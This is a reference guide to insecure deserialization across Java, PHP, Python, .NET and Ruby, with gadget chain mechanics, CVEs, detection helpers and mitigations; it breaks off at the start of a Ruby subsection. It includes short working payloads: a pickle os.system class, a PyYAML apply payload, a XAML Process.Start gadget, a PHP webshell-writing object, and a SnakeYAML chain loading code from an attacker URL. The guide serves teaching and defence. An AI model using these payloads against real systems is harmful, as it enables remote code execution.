Comprehensive Insecure Deserialization Guide#
A practitioner’s reference for insecure deserialization — language-specific attack surface, gadget chain mechanics, real-world CVE chains, tools, and detection/prevention. Compiled from 47 research sources.
Table of Contents#
- Fundamentals
- Attack Surface & Entry Points
- Java Deserialization
- PHP Object Injection
- Python Pickle & ML Pipelines
- .NET Deserialization
- Ruby Marshal & YAML
- Node.js Deserialization
- YAML & JSON Format Attacks
- Gadget Chains Explained
- Real-World CVEs & Exploitation Chains
- Tools & Automation
- Detection & Static Analysis
- Prevention & Mitigation
- Signature & Gadget Quick Reference
1. Fundamentals#
Insecure deserialization occurs when an application reconstructs program objects from attacker-controlled data without sufficient validation. Serialization converts an in-memory object graph to a byte stream for storage or transit; deserialization reverses the process. The danger is that most native serialization formats are not just data — they are instructions for how to rebuild arbitrary objects, including which classes to instantiate and which methods (constructors, magic methods, callbacks) to run along the way.
Three broad impact classes:
| Class | Description | Canonical Example |
|---|---|---|
| Remote Code Execution | Attacker reaches a native sink (Runtime.exec, os.system, eval, system()) through a gadget chain | Java CommonsCollections → Runtime.exec |
| Object Injection / Logic Abuse | Attacker smuggles an unexpected object type that alters control flow, writes files, or performs SQLi | PHP __destruct → file_put_contents shell upload |
| Denial-of-Service | Recursive object graphs, billion-laughs, hash collision, resource exhaustion | SnakeYAML billion-laughs, Java HashMap hash DoS |
Why it persists: the vulnerability is in data, not code. The sink (readObject, unserialize, pickle.loads, Marshal.load, BinaryFormatter.Deserialize) looks correct in isolation; the bug is the trust boundary around what reaches it. Static analyzers flag the call but cannot reason about whether the bytes arriving were produced by trusted code.
The gadget chain abstraction: RCE is rarely achieved in a single hop. Instead, attackers assemble a graph of “gadgets” — legitimate classes already on the application classpath that, when deserialized in a particular shape, cause method dispatch to cascade until a dangerous sink is reached. The application doesn’t need to ship malicious code; it only needs to load a library that contains usable gadgets.
Key insight: you cannot patch your way out of this. Every patched gadget chain is followed by another built from different links on the same classpath. The only durable fix is to eliminate native deserialization of untrusted input entirely.
2. Attack Surface & Entry Points#
Where serialized blobs cross trust boundaries#
| Category | Examples |
|---|---|
| HTTP parameters | Base64-encoded state, token, data, session, view, cache params |
| Cookies | Session cookies, remember_me, flash messages, CSRF tokens encoding objects |
| Hidden form fields | ASP.NET __VIEWSTATE, Rails _session_id, JSF javax.faces.ViewState |
| Cache layers | Memcached/Redis blobs, Rails cache store with Marshal, Django pickle sessions |
| Message queues | RabbitMQ, Kafka, ActiveMQ, SQS, ZeroMQ payloads between services |
| RMI / RPC | Java RMI registry, JMX, JNDI, CORBA, DRb |
| File uploads | .ser, .rdb, .pkl, .joblib, .pt, .phar model/checkpoint files |
| WebSockets / IPC | Distributed serving frameworks passing pickle or Marshal over sockets |
| Email headers | X-SerializedObject style custom headers, WSDL SOAP bodies |
| Log ingestion | Log4j-style object injection, Graylog inputs, serialized stack traces |
| Database columns | Opaque BLOB/bytea fields holding serialized objects |
Sink functions by language#
Java: ObjectInputStream.readObject(), XMLDecoder.readObject(),
XStream.fromXML(), Yaml.load() (SnakeYAML),
Jackson ObjectMapper with enableDefaultTyping(),
Kryo.readObject(), Hessian, Castor, Burlap
PHP: unserialize(), phar:// wrapper (file ops trigger), yaml_parse(),
Laminas Zend_Serializer, Symfony Serializer XML
Python: pickle.loads/load, cPickle, joblib.load, torch.load,
numpy.load(allow_pickle=True), pyyaml yaml.load (unsafe),
shelve, dill.loads, marshal.loads, jsonpickle.decode
.NET: BinaryFormatter.Deserialize, SoapFormatter, LosFormatter,
ObjectStateFormatter, NetDataContractSerializer,
JavaScriptSerializer (with SimpleTypeResolver),
Json.NET with TypeNameHandling != None, DataContractSerializer,
XmlSerializer with arbitrary types
Ruby: Marshal.load, YAML.load (pre-Psych 4), JSON.parse(create_additions:true),
Oj.load (default mode), Rails cache store :marshal
Node.js: node-serialize unserialize(), funcster, serialize-javascript
(with IIFE), eval-based JSON revivers
Content-type & magic byte fingerprints#
| Format | Signature | Notes |
|---|---|---|
| Java serialized | AC ED 00 05 (rO0 base64) | ObjectOutputStream header |
| PHP serialized | O:<num>:"ClassName":<num>:{...} | Also a:, s:, i: primitives |
| Python pickle | 80 04 / 80 05 (proto 4/5) | Starts with PROTO opcode |
| .NET BinaryFormatter | 00 01 00 00 00 FF FF FF FF | SerializationHeaderRecord |
| Ruby Marshal | 04 08 | Major 4, minor 8 |
| ASP.NET ViewState | /wEP, /wEX base64 prefix | Deserialized server-side |
| Phar | <?php __HALT_COMPILER(); manifest | PHP-parsed metadata |
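The signatures in the table can be turned into a quick triage helper. The following is a minimal sketch, not a complete detector: the function name `fingerprint` and the labels it returns are illustrative assumptions, the two-byte magics (pickle, Marshal) will produce false positives on arbitrary binary data, and only one layer of base64 is peeled.

```python
import base64
import binascii
import re
from typing import Optional

# Raw-byte signatures taken from the fingerprint table.
RAW_SIGNATURES = [
    ("java-serialized", bytes.fromhex("aced0005")),
    ("dotnet-binaryformatter", bytes.fromhex("0001000000ffffffff")),
    ("python-pickle", bytes.fromhex("8004")),  # protocol 4
    ("python-pickle", bytes.fromhex("8005")),  # protocol 5
    ("ruby-marshal", bytes.fromhex("0408")),
]
# PHP serialized values are text: O:<len>:"Class", a:<n>:{, s:<len>:", i:<n>;
PHP_PATTERN = re.compile(rb'^(O:\d+:"|a:\d+:\{|s:\d+:"|i:-?\d+;)')


def fingerprint(blob: bytes, _decoded: bool = False) -> Optional[str]:
    """Return a format label for a suspected serialized blob, or None."""
    for label, magic in RAW_SIGNATURES:
        if blob.startswith(magic):
            return label
    if PHP_PATTERN.match(blob):
        return "php-serialized"
    if b"__HALT_COMPILER();" in blob:
        return "phar"
    if _decoded:
        return None  # only peel one base64 layer
    if blob.startswith((b"/wEP", b"/wEX")):
        return "aspnet-viewstate"
    try:
        decoded = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return fingerprint(decoded, _decoded=True)
```

A proxy plugin or log scanner could call `fingerprint()` on each parameter and cookie value and flag anything that does not return `None` for manual review.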
3. Java Deserialization#
The core primitive#
Any class implementing java.io.Serializable can be reconstructed by ObjectInputStream.readObject(). A class may define a private readObject(ObjectInputStream in) method that is invoked during deserialization — this is where custom logic runs, and it is the primary entry ramp for gadget chains.
ObjectInputStream ois = new ObjectInputStream(request.getInputStream());
Object obj = ois.readObject(); // attacker-controlled byte stream
The default readObject will happily deserialize any class on the classpath that implements Serializable. Unless a serialization filter (ObjectInputFilter, JEP 290) has been configured, there is no type filter. The “expected type” cast ((User) ois.readObject()) happens after the object graph is fully reconstructed and all side effects have fired.
Classic sink entry points#
| Sink | Library | Notes |
|---|---|---|
| ObjectInputStream.readObject | JDK core | Foundation of all classic Java deserialization bugs |
| XMLDecoder.readObject | java.beans | Pure XML RCE; constructor chains via <object class=...> |
| XStream.fromXML | XStream | Whitelist-by-default only since v1.4.18 |
| Yaml.load | SnakeYAML (<2.0) | Instantiates arbitrary classes from !! tags |
| ObjectMapper.readValue + enableDefaultTyping | Jackson | Polymorphic deserialization via @class hints |
| Kryo.readObject / readClassAndObject | Kryo | Default config registers arbitrary classes |
| Hessian.getInputStream | Hessian/Burlap | Used in older Spring Remoting, Caucho |
| JNDI lookup | JNDI/LDAP/RMI | Log4Shell’s cousin: remote class loading |
Gadget chain anatomy (CommonsCollections1)#
The canonical chain, dissected from ysoserial’s CommonsCollections1.java, illustrates the building blocks seen in almost every Java chain:
- Entry gadget (readObject trigger). sun.reflect.annotation.AnnotationInvocationHandler has a readObject method that calls memberValues.entrySet(). If memberValues is a dynamic Proxy backed by another AnnotationInvocationHandler, entrySet() routes through InvocationHandler.invoke().
- Bridge gadget (method dispatch). The inner AnnotationInvocationHandler.invoke() calls memberValues.get(name). When memberValues is a LazyMap, get() invokes the map’s factory.transform(key) for missing keys.
- Transform chain (ChainedTransformer). A ChainedTransformer pipes the initial input through an array of Transformer instances, each feeding the next:
  - ConstantTransformer(Runtime.class): returns the Runtime class object
  - InvokerTransformer("getMethod", ..., {"getRuntime", new Class[0]}): reflectively fetches the getRuntime method
  - InvokerTransformer("invoke", ..., {null, new Object[0]}): invokes it, returning a Runtime instance
  - InvokerTransformer("exec", ..., execArgs): finally calls Runtime.exec(cmd)
The sink is reached not by any single class being malicious, but by abusing reflection primitives exposed in a widely-used utility library.
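To make the dispatch cascade concrete, here is a Python analogy of the LazyMap and ChainedTransformer mechanics. It is a sketch under stated assumptions, not the commons-collections code: the class names mirror the Java ones for readability, `getattr` stands in for Java reflection, and the chain ends in harmless string methods rather than Runtime.exec.

```python
class ConstantTransformer:
    """Ignores its input and returns a fixed value."""

    def __init__(self, value):
        self.value = value

    def transform(self, _input):
        return self.value


class InvokerTransformer:
    """Calls a named method on its input: the reflection primitive."""

    def __init__(self, method_name, *args):
        self.method_name = method_name
        self.args = args

    def transform(self, target):
        return getattr(target, self.method_name)(*self.args)


class ChainedTransformer:
    """Feeds the output of each transformer into the next one."""

    def __init__(self, transformers):
        self.transformers = transformers

    def transform(self, value):
        for transformer in self.transformers:
            value = transformer.transform(value)
        return value


class LazyMap(dict):
    """A map that asks its factory to create values for missing keys."""

    def __init__(self, factory):
        super().__init__()
        self.factory = factory

    def __missing__(self, key):
        value = self.factory.transform(key)
        self[key] = value
        return value


# Benign stand-in for the Runtime.exec chain: "id" -> "ID" -> "**ID**".
chain = ChainedTransformer([
    ConstantTransformer("id"),
    InvokerTransformer("upper"),
    InvokerTransformer("center", 6, "*"),
])
lazy = LazyMap(chain)
result = lazy["any-missing-key"]  # a plain map lookup triggers the whole chain
```

The caller only performs a map lookup; everything that runs afterwards was chosen by whoever populated the object graph, which is the property the Java chain exploits.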
Why patching individual gadgets fails#
The AnnotationInvocationHandler entry was patched in JDK 8u72 — memberValues must now be a LinkedHashMap. But LazyMap, InvokerTransformer, and ChainedTransformer live in commons-collections and are not part of the JDK. CommonsCollections5 reused the same backend chain but substituted a new entry ramp (BadAttributeValueExpException.readObject calling toString() on an arbitrary object). The backend survived; only the front door changed.
This is the defining pattern of Java deserialization defense: you cannot remove the gadgets (they’re in third-party jars), you cannot remove the sink (it’s in the JDK), and every patched entry is followed by another discovered entry reusing the same backend.
Well-known gadget chain families (ysoserial)#
| Chain | Trigger | Backend | Requires |
|---|---|---|---|
| CommonsCollections1 | AnnotationInvocationHandler.readObject | LazyMap + ChainedTransformer | commons-collections 3.1, JDK ≤ 8u71 |
| CommonsCollections2 | PriorityQueue.readObject → compare | TransformingComparator | commons-collections4 4.0 |
| CommonsCollections5 | BadAttributeValueExpException.readObject → toString | LazyMap | commons-collections 3.1, any JDK |
| CommonsCollections6 | HashSet.readObject → hashCode | LazyMap | commons-collections 3.1, any JDK |
| CommonsBeanutils1 | PriorityQueue → BeanComparator | PropertyUtils.getProperty → reflection | commons-beanutils |
| Groovy1 | ConvertedClosure.invoke | MethodClosure("execute") | Groovy ≤ 2.4.3 |
| Spring1, Spring2 | ObjectFactory proxy chains | JDK only + spring-core | Older Spring |
| Hibernate1, Hibernate2 | ComponentType.getPropertyValue | JDK reflection | Hibernate |
| JRMPClient / JRMPListener | RMI remote class loading | Outbound JRMP callback | Network egress |
| URLDNS | HashMap.readObject → URL.hashCode | DNS lookup | Useful as blind probe (no RCE) |
| ROME, Click1, Clojure, JBossInterceptors1, C3P0, MozillaRhino1, Myfaces1, Wicket1 | Various | Various | Application-specific |
SnakeYAML (CVE-2022-1471)#
Before SnakeYAML 2.0, Yaml.load() was effectively equivalent to calling ObjectInputStream.readObject for any class on the classpath. YAML tags like !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://attacker/"]]]] could instantiate a ScriptEngineManager pointed at a remote META-INF/services file, loading arbitrary code via JAR SPI. The maintainers initially declined to change defaults, arguing documentation was sufficient — eight CVEs later, 2.0 finally made SafeConstructor the default.
Jackson polymorphic deserialization#
Jackson is safe when deserializing fixed types. It becomes dangerous when ObjectMapper.enableDefaultTyping() is set or classes use @JsonTypeInfo(use = Id.CLASS). The JSON then carries a @class (or @type) hint telling Jackson which concrete class to instantiate, converting a JSON endpoint into an arbitrary gadget instantiation primitive. Blocklists (SubTypeValidator) are maintained by Jackson maintainers but have been bypassed repeatedly.
4. PHP Object Injection#
The unserialize() primitive#
PHP’s serialize()/unserialize() encode the class name, property names, and property values of any object. On deserialization, PHP instantiates the named class with the encoded property values directly assigned — the constructor is not invoked. Instead, specific “magic methods” fire automatically:
| Magic Method | When It Fires |
|---|---|
| __wakeup() | Immediately after unserialization |
| __destruct() | When the object is garbage collected (end of request) |
| __toString() | When the object is cast to string (comparisons, echo, string concat) |
| __call() | When an undefined method is invoked |
| __get() / __set() | When undefined properties are accessed |
| __invoke() | When the object is called as a function |
| __unserialize() (PHP 7.4+) | Replaces __wakeup if defined |
Serialized string format#
O:12:"LoggingClass":2:{s:8:"filename";s:9:"shell.php";s:7:"content";s:20:"<?php evilCode(); ?>";}
- O:12:"LoggingClass" is an object of class LoggingClass (name length 12)
- 2:{...} declares two properties
- s:8:"filename" is a string key of length 8
- s:9:"shell.php" is a string value of length 9
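The length prefixes are byte counts, which is easy to verify by rebuilding the example string. The sketch below is illustrative only: `php_string` and `php_object` are hypothetical helper names, and they cover public string properties and nothing else (no integers, arrays, nesting, or private/protected property name mangling).

```python
def php_string(value: str) -> str:
    """Encode one PHP string as s:<byte length>:"<value>";"""
    byte_length = len(value.encode("utf-8"))
    return 's:{}:"{}";'.format(byte_length, value)


def php_object(class_name: str, properties: dict) -> str:
    """Encode an object with public string properties only (illustrative)."""
    body = "".join(php_string(k) + php_string(v) for k, v in properties.items())
    return 'O:{}:"{}":{}:{{{}}}'.format(
        len(class_name.encode("utf-8")), class_name, len(properties), body
    )


# Rebuilds the LoggingClass example from this section.
encoded = php_object(
    "LoggingClass",
    {"filename": "shell.php", "content": "<?php evilCode(); ?>"},
)
```

Because every field is length-prefixed plain text, anyone who can edit the string can change the class name or property values as long as the counts are kept consistent.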
Property-Oriented Programming (POP) chains#
Like Java gadget chains, but chained through PHP magic methods and method calls in class __destruct / __wakeup / __toString hooks. The Sonar example illustrates the minimal case — a LoggingClass whose destructor writes $this->content to $this->filename. An attacker serializes an instance with filename = "shell.php" and content = "<?php system($_GET[0]); ?>", and the destructor drops a webshell at request end.
Real POP chains are longer. Typical primitives:
- A destructor that calls $this->obj->method() where $this->obj is another attacker-chosen class
- A __toString that builds a SQL query or file path from properties
- A __wakeup that calls eval, include, or file_put_contents on serialized properties
- A __call that forwards to call_user_func_array($this->callback, $this->args)
PrestaShop, Drupal (CVE-2019-6340), Joomla, Magento, WordPress core, Pydio, phpBB, and SuiteCRM all had disclosed POP chains reaching RCE.
Phar deserialization (pre-PHP 8)#
A subtle variant: PHP’s phar:// stream wrapper parses PHAR metadata via unserialize() when any file operation (including file_exists, filesize, is_dir) touches a PHAR file path. An attacker who can:
- Upload a file of any extension containing PHAR metadata (the PHAR format tolerates arbitrary headers — JPEG EXIF, GIF comments, etc.)
- Trigger a file operation on phar://uploads/avatar.jpg/foo
…reaches unserialize without ever calling it directly. The avatar upload path becomes an RCE. PHP 8.0 removed implicit metadata unserialization; earlier versions remain exposed.
Common PHP deserialization entry points#
- Laravel cookie encryption (when APP_KEY leaks, serialized payloads pass integrity)
- WooCommerce and WordPress meta fields stored as serialized PHP
- Yii restoreGET, CodeIgniter session library (with encryption disabled)
- Symfony Cookie/State components in older versions
- Legacy Zend Framework Zend_Serializer
5. Python Pickle & ML Pipelines#
Pickle is a stack VM, not a data format#
pickle.loads() executes a small stack-based virtual machine. One of its opcodes, REDUCE, pops a callable and an argument tuple from the stack and calls the callable with those arguments. Any object that defines __reduce__() returning (callable, args) becomes a function call when loaded:
import os
import pickle

class P:
    def __reduce__(self):
        return (os.system, ("id",))

pickle.dumps(P())  # -> bytes that call os.system("id") on load
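The stock pickle.loads() applies no blocklist and no sandbox, and it gives the caller no chance to veto the call; the only hook is a custom Unpickler subclass that overrides find_class(), which almost no loading code uses. The Python docs warn about this in a prominent box that approximately nobody reads because the code that loads pickle files is written by ML engineers, not security engineers.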
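The REDUCE behaviour can be observed safely by swapping the dangerous callable for a harmless one and disassembling the result. This is a small sketch: the class name `Demo` is made up, and `len` stands in for os.system so that loading the blob has no side effects.

```python
import pickle
import pickletools


class Demo:
    def __reduce__(self):
        # Harmless stand-in for os.system: any importable callable works here.
        return (len, ("harmless",))


blob = pickle.dumps(Demo(), protocol=4)

# Walk the opcode stream without executing it.
opcode_names = [op.name for op, _arg, _pos in pickletools.genops(blob)]

# Loading does not rebuild a Demo instance; it calls len("harmless").
loaded = pickle.loads(blob)
```

Note that the `Demo` class never appears in the byte stream. The pickle only records which callable to import and which arguments to pass, so the loading side needs nothing but the standard library to run the call.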
The ML pipeline problem#
Every ML tutorial ends with pickle.dump(model, f) / pickle.load(f). Higher-level libraries hide pickle under innocuous names:
| Function | Actually Calls |
|---|---|
| joblib.load(path) | pickle.load |
| torch.load(path) (pre-2.6 default) | pickle.load over tensor data |
| numpy.load(path, allow_pickle=True) | pickle.load |
| dill.load | pickle with extra object support |
| cloudpickle.load | pickle with closure support |
| HuggingFace transformers older models | pickle under the hood |
| ZeroMQ recv_pyobj() | pickle.loads on wire bytes |
A code reviewer sees joblib.load(model_path) and approves it. The reviewer does not ask where model_path came from. In a typical pipeline the file was downloaded by a training service, pushed to S3, cached by a registry, and finally loaded by inference — the chain of custody is invisible at the load site.
CVE-2025-32444 (vLLM, CVSS 10.0)#
vLLM’s Mooncake integration for distributed KV-cache transfer called recv_pyobj() on ZeroMQ sockets bound to 0.0.0.0. Any host on the network could ship a pickle payload and get RCE. The code looked correct — ZMQ is a legitimate IPC mechanism and recv_pyobj is a legitimate API. The bug is that “structured message between trusted workers” silently became “unauthenticated pickle deserialization endpoint.”
LightLLM (CVE-2026-26220)#
Same vulnerability class, WebSocket-based. The prefill-decode disaggregation system deserialized incoming binary frames with pickle.loads(). A nonce-based auth check existed but the default nonce was an empty string — falsy in Python, so the check was skipped. The server explicitly refused to bind to localhost, guaranteeing network exposure.
data = await websocket.receive_bytes()
obj = pickle.loads(data) # untrusted WebSocket binary frame
There was no reason to use pickle for this — the payload was worker registration metadata (strings, ints, dicts). JSON or MessagePack would have worked fine. Pickle was the path of least resistance in Python and nobody thought about it.
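A data-only format with explicit validation covers this kind of message. The sketch below assumes a hypothetical registration schema (`worker_id`, `host`, `port`); the real LightLLM field names are not given in this guide, so treat them as placeholders.

```python
import json

# Hypothetical schema for a worker registration frame.
EXPECTED_FIELDS = {"worker_id": str, "host": str, "port": int}


def parse_registration(frame: bytes) -> dict:
    """Decode a registration frame as JSON and enforce the expected shape."""
    message = json.loads(frame.decode("utf-8"))
    if not isinstance(message, dict):
        raise ValueError("registration must be a JSON object")
    if set(message) != set(EXPECTED_FIELDS):
        raise ValueError("unexpected or missing fields")
    for name, expected_type in EXPECTED_FIELDS.items():
        value = message[name]
        # bool is a subclass of int in Python, so reject it explicitly.
        if isinstance(value, bool) or not isinstance(value, expected_type):
            raise ValueError("field {!r} has the wrong type".format(name))
    return message
```

A pickle payload sent to this parser fails at the decoding step, because JSON has no opcode that imports or calls anything. UnicodeDecodeError and json.JSONDecodeError are both subclasses of ValueError, so callers can handle every rejection with one except clause.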
PickleScan is fundamentally fragile#
Picklescan (used by HuggingFace) parses pickle bytecode and matches against a blocklist of dangerous imports. The problem is architectural: pickle is Turing-complete, and parsing divergence between picklescan and PyTorch creates bypass primitives:
- ZIP flag bit flipping (Sonatype) — PyTorch’s ZIP reader accepts flipped general-purpose bit flags that picklescan silently skips.
- Subclass imports (JFrog) — using a subclass of a blocklisted module downgrades picklescan’s “Dangerous” verdict to “Suspicious” while still executing fine.
- Non-standard file extensions — loader accepts it, scanner ignores it.
- Gadget diversity — academic research (PickleBall / Brown University CCS 2025) identified 133 exploitable function gadgets across stdlib and common ML deps, achieving near-100% scanner bypass.
Even the best-performing scanner in the PickleBall study let 89% of gadgets through. This is not fixable within the current approach.
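The approach and its weakness can both be seen in a toy version of an import-blocklist scanner. This is a simplified sketch and not picklescan's actual implementation: the blocklist is a tiny illustrative sample, and the STACK_GLOBAL handling just takes the two most recent string pushes, which memoized strings fetched by other opcodes would already defeat.

```python
import os
import pickle
import pickletools
import subprocess

# Tiny illustrative blocklist of (module, name) pairs.
BLOCKLIST = {
    ("os", "system"), ("posix", "system"), ("nt", "system"),
    ("builtins", "eval"), ("builtins", "exec"),
}


def list_imports(blob: bytes) -> list:
    """Statically list (module, name) pairs a pickle asks the loader to import."""
    imports, recent_strings = [], []
    for op, arg, _pos in pickletools.genops(blob):
        if op.name in ("GLOBAL", "INST"):
            module, name = arg.split(" ", 1)
            imports.append((module, name))
        elif op.name == "STACK_GLOBAL":
            # Naive: assume the two latest string pushes are module and name.
            if len(recent_strings) >= 2:
                imports.append((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return imports


def verdict(blob: bytes) -> str:
    return "dangerous" if BLOCKLIST.intersection(list_imports(blob)) else "clean"


# pickle.dumps on a function only records a reference; nothing is executed here.
flagged = verdict(pickle.dumps(os.system, protocol=4))
missed = verdict(pickle.dumps(subprocess.check_output, protocol=4))
```

The second blob references a callable that is just as capable of running commands, yet it passes because nobody listed it. Every gadget that is not on the list, and every parsing difference between scanner and loader, is a bypass.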
torch.load: incomplete migration#
Before PyTorch 1.13, torch.load(path) unpickled the entire checkpoint with no restrictions. 1.13 added the opt-in weights_only=True; 2.6 finally changed the default. But the installed base of unsafe patterns is enormous: old tutorials, copy-pasted notebooks, and vendor scripts that pin PyTorch to earlier versions still exist in production.
Rule for review: torch.load() without weights_only=True is a finding unless the checkpoint source is fully trusted internal infrastructure with integrity verification.
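The review rule is mechanical enough to automate. The sketch below uses only the standard library `ast` module; the function name is made up, and it deliberately handles just the literal spelling `torch.load(...)`, so aliased imports (`from torch import load`, `import torch as t`) would need extra handling.

```python
import ast
from typing import List


def find_unsafe_torch_load(source: str) -> List[int]:
    """Return line numbers of torch.load(...) calls lacking weights_only=True."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        is_torch_load = (
            isinstance(func, ast.Attribute)
            and func.attr == "load"
            and isinstance(func.value, ast.Name)
            and func.value.id == "torch"
        )
        if not is_torch_load:
            continue
        has_safe_flag = any(
            kw.arg == "weights_only"
            and isinstance(kw.value, ast.Constant)
            and kw.value.value is True
            for kw in node.keywords
        )
        if not has_safe_flag:
            findings.append(node.lineno)
    return sorted(findings)
```

Running it over each changed file in CI turns the rule into a gate; anything it reports still needs a human to decide whether the checkpoint source is trusted.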
Supply-chain vector#
Model weights are distributed as files. A 2025 Brown University study found roughly half of popular HuggingFace repositories still contain pickle-backed models, including releases from Meta, Google, Microsoft, NVIDIA, and Intel. Attack patterns:
- Compromised account: push new weights, every downstream pull runs the payload
- Typosquatting: bert-base-uncased vs bert_base_uncased
- Malicious fine-tunes: functional model with payload in serialization wrapper
- Tensor steganography: hiding callable references in weight perturbations small enough not to affect accuracy
PyYAML’s yaml.load#
In PyYAML 5.1 through 5.4, yaml.load(data) without an explicit Loader emits a warning and falls back to FullLoader, which is meant to block arbitrary Python object construction; PyYAML 6.0 makes the Loader argument mandatory. But enormous amounts of legacy code pass Loader=yaml.Loader (the unsafe loader) or use pre-5.1 versions where the default was unsafe. The canonical payload:
!!python/object/apply:os.system ["id"]
Docling RCE (CVE-2026-24009) — a shadow vulnerability introduced into Docling via an unpinned PyYAML version that regressed to accepting arbitrary tags in one code path. The fix was to switch to yaml.safe_load unconditionally.
6. .NET Deserialization#
The dangerous formatters#
.NET ships with multiple serialization APIs; some are safe, several are explicitly marked insecure:
| Formatter | Status | Notes |
|---|---|---|
| BinaryFormatter | Insecure | Microsoft: “cannot be made secure”; obsoleted in .NET 5+ |
| SoapFormatter | Insecure | Same type-loading model as BinaryFormatter |
| NetDataContractSerializer | Insecure | Preserves .NET types, loads arbitrary |
| ObjectStateFormatter | Insecure | ASP.NET ViewState backend |
| LosFormatter | Insecure | Legacy ASP.NET |
| JavaScriptSerializer with SimpleTypeResolver | Insecure | Allows __type hints |
| Json.NET with TypeNameHandling != None | Dangerous | $type property instantiates arbitrary classes |
| XmlSerializer with unrestricted types | Dangerous | Requires declared types at compile time; safer if constrained |
| DataContractSerializer | Safer | Known-types list enforced |
| System.Text.Json | Safe (default) | No polymorphic default |
Microsoft’s official guidance: “BinaryFormatter is insecure and can’t be made secure.” Period. There is no allowlist configuration that makes it safe against untrusted input.
Sink patterns#
// Classic vulnerable pattern (System.Runtime.Serialization.Formatters.Binary)
var fmt = new BinaryFormatter();
var obj = fmt.Deserialize(request.InputStream); // RCE

// Json.NET danger (Newtonsoft.Json)
var settings = new JsonSerializerSettings {
    TypeNameHandling = TypeNameHandling.All // Objects, Arrays, and Auto are also unsafe
};
var typed = JsonConvert.DeserializeObject<object>(json, settings);
Known .NET RCE gadget families (ysoserial.net)#
| Gadget | Works Against | Notes |
|---|---|---|
| TypeConfuseDelegate | BinaryFormatter, LosFormatter, ObjectStateFormatter, NetDataContractSerializer | Sorts a list with a MulticastDelegate confused into calling Process.Start |
| ActivitySurrogateSelector | BinaryFormatter, SoapFormatter | Abuses surrogate selector to compile and run C# at deserialization time |
| ActivitySurrogateSelectorFromFile | Same | Variant that loads an assembly from disk |
| WindowsIdentity | BinaryFormatter, NetDataContractSerializer | Uses WindowsIdentity deserialization callback |
| RolePrincipal | Same | Security principal gadget |
| DataSet | BinaryFormatter, SoapFormatter, XmlSerializer with DataSet | System.Data.DataSet XML type confusion |
| SessionSecurityToken | Json.NET, NetDataContractSerializer | WIF token gadget |
| ObjRef (TransparentProxy) | Remoting | .NET Remoting cross-AppDomain trick |
| TextFormattingRunProperties | BinaryFormatter, LosFormatter, ObjectStateFormatter, SoapFormatter, NetDataContractSerializer | XAML-embedded ObjectDataProvider reach to Process.Start |
| PSObject | BinaryFormatter | PowerShell object gadget |
XAML ObjectDataProvider — the universal .NET gadget#
The System.Windows.Data.ObjectDataProvider class takes a target type, a method name, and method parameters, and invokes them. Any formatter that can reach XAML parsing (directly or via TextFormattingRunProperties, via XamlReader.Parse, or via Json.NET’s XAML types) can achieve RCE with a single object. It’s the .NET equivalent of InvokerTransformer.
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:s="clr-namespace:System;assembly=mscorlib"
    xmlns:c="clr-namespace:System.Diagnostics;assembly=system">
  <ObjectDataProvider x:Key="x" ObjectType="{x:Type c:Process}" MethodName="Start">
    <ObjectDataProvider.MethodParameters>
      <s:String>cmd.exe</s:String>
      <s:String>/c calc</s:String>
    </ObjectDataProvider.MethodParameters>
  </ObjectDataProvider>
</ResourceDictionary>
ASP.NET ViewState#
ViewState is a base64-encoded blob sent in a hidden __VIEWSTATE form field carrying page control state. It is deserialized server-side by ObjectStateFormatter. Protection relies on <machineKey> HMAC validation (when enabled) and encryption. Leak or brute-force of machineKey turns ViewState into an unauthenticated RCE sink — ysoserial.net’s TextFormattingRunProperties gadget is the canonical payload.
This is exactly the attack surface behind the SharePoint ToolShell campaign (CVE-2025-53770) and the related CVE-2021-27076 “replay-style” attack. A custom webshell parses parameters from __VIEWSTATE, enabling insecure deserialization against on-prem SharePoint. Over 4,600 compromise attempts against 300+ organizations were observed in one week of July 2025.
Defensive must-do: rotate ASP.NET machine keys after any suspected exposure; keep ViewState MAC validation enabled (enableViewStateMac="true"); never disable the MAC to work around validation errors.
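Why the key is the whole defence is easiest to see in a stripped-down model of MAC-protected state. This is a conceptual sketch in Python, not ASP.NET's actual ViewState format or key derivation: `sign_state` and `verify_state` are hypothetical helpers that append and check an HMAC-SHA256 tag.

```python
import hashlib
import hmac

TAG_LENGTH = hashlib.sha256().digest_size  # 32 bytes


def sign_state(blob: bytes, key: bytes) -> bytes:
    """Append an HMAC-SHA256 tag to the serialized state."""
    return blob + hmac.new(key, blob, hashlib.sha256).digest()


def verify_state(signed: bytes, key: bytes) -> bytes:
    """Return the state only if its tag verifies; deserialize nothing before this."""
    if len(signed) < TAG_LENGTH:
        raise ValueError("state too short to carry a MAC")
    blob, tag = signed[:-TAG_LENGTH], signed[-TAG_LENGTH:]
    expected = hmac.new(key, blob, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC mismatch")
    return blob
```

Tampered state is rejected, but anyone holding the key can call `sign_state` on a gadget payload and the server will accept it as its own. That is why a leaked machineKey has to be rotated rather than merely patched around.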
Notable .NET deserialization CVEs#
| CVE | Product | Formatter |
|---|---|---|
| CVE-2020-25258 | Hyland OnBase | BinaryFormatter |
| CVE-2021-27076 | SharePoint (replay-style) | ObjectStateFormatter/ViewState |
| CVE-2021-29508 | Wire (Proto.Actor) | BinaryFormatter |
| CVE-2022-21969 | Exchange Server | BinaryFormatter via MAPI |
| CVE-2023-3513 | Razer Central Service | BinaryFormatter IPC |
| CVE-2023-5914 | CentralSquare | BinaryFormatter |
| CVE-2023-6184 | Third-party ASP.NET app | ViewState |
| CVE-2025-53770 | SharePoint (ToolShell) | ViewState |
| CVE-2026-20963 | SharePoint | Deserialization RCE |
| CVE-2026-26114 | SharePoint | Deserialization RCE |
7. Ruby Marshal & YAML#
Marshal.load — a decade of whack-a-mole#
Ruby’s Marshal module is the language’s native binary serialization format. Passing any untrusted bytes to Marshal.load should be treated as arbitrary code execution. The vulnerability was first publicly discussed in a 2013 Ruby bug tracker issue by Charlie Somerville (now Hailey) and has resisted fixes ever since.
class UserRestoreController < ApplicationController
  def show
    user_data = params[:data]
    deserialized = Marshal.load(Base64.decode64(user_data))
    render plain: "Restored: #{deserialized.inspect}"
  end
end
Gadget chain timeline#
